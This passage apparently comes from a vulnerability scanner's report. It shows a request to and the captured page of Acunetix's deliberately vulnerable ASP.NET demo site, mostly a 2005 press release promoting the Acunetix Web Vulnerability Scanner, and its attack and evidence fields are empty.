RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4+8K4F/0js11lBw12IN/OFdqHcc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKpz/fHDgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:46 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1F